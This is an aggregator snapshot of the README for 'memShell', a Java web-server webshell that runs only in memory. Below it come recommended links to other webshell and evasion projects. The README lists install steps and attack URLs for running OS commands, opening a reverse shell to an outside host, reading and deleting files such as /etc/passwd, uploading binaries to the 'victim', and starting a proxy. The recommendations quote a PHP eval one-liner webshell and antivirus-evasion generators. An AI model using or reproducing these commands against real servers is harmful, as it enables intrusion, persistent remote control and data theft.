GitHub - rebeyond/memShell: a webshell resides in the memory of java web server
source link: https://github.com/rebeyond/memShell
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
README.md
memShell
a webshell resides in the memory of java web server
install
- unzip memShell.zip
- cd memShell
- java -jar inject.jar
usage
- anyurl?pwd=pass //show this help page.
- anyurl?pwd=pass&model=exec&cmd=whoami //run os command.
- anyurl?pwd=pass&model=connectback&ip=8.8.8.8&port=51 //reverse a shell back to 8.8.8.8 on port 51.
- anyurl?pwd=pass&model=urldownload&url=http://xxx.com/test.pdf&path=/tmp/test.pdf //download a remote file via the victim's network directly.
- anyurl?pwd=pass&model=list[del|show]&path=/etc/passwd //list,delete,show the specified path or file.
- anyurl?pwd=pass&model=download&path=/etc/passwd //download the specified file on the victim's disk.
- anyurl?pwd=pass&model=upload&path=/tmp/a.elf&content=this_is_content[&type=b] //upload a text file or a base64 encoded binary file to the victim's disk.
- anyurl?pwd=pass&model=proxy //start a socks proxy server on the victim.
- anyurl?pwd=pass&model=chopper //start a chopper server agent on the victim.
!!!It is recommended to use the POST method to submit data.
note
For learning exchanges only, do not use for illegal purposes.by rebeyond.
Recommend
-
215
PHP-WebShell-Bypass-WAF PHP WebShell 一句话的结构是:输入和执行,这是经典的PHP 一句话代码: <?php eval($_GET['test']); ?> <?php eval($_POST['test']); ?> WebShell 的输入点在$_GET 和...
-
167
tennc/webshell ...
-
102
一个比较好玩的WebShell上传检测绕过案例 2017年12月25日 by a.tm.k·一个比较...
-
117
TinyShop缓存文件获取WebShell之0day-小兵搞安全-51CTO博客
-
58
README.md webshellSample webshell sample for webshel check module
-
132
README.md 2019.6.7 更新日志 1.原项目名称 "利用随机异或无限免杀d盾" 更改为 "webshell-venom" 2.增添aspx免杀生成脚本...
-
39
README.md WebShell This is a webshell open source project https://github.com/xl7dev/WebShell...
-
4
Govern your data wherever it resides with Azure Purview Posted on September 28, 2021
-
31
JSPHorse 一个JSP免杀Webshell生成器,支持普通回显Webshell:1.jsp?pwd=xxx&cmd=whoami 已完成蚁剑免杀Webshell! へ /| /\7 ∠_/ / │ / / │ ...
-
6
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK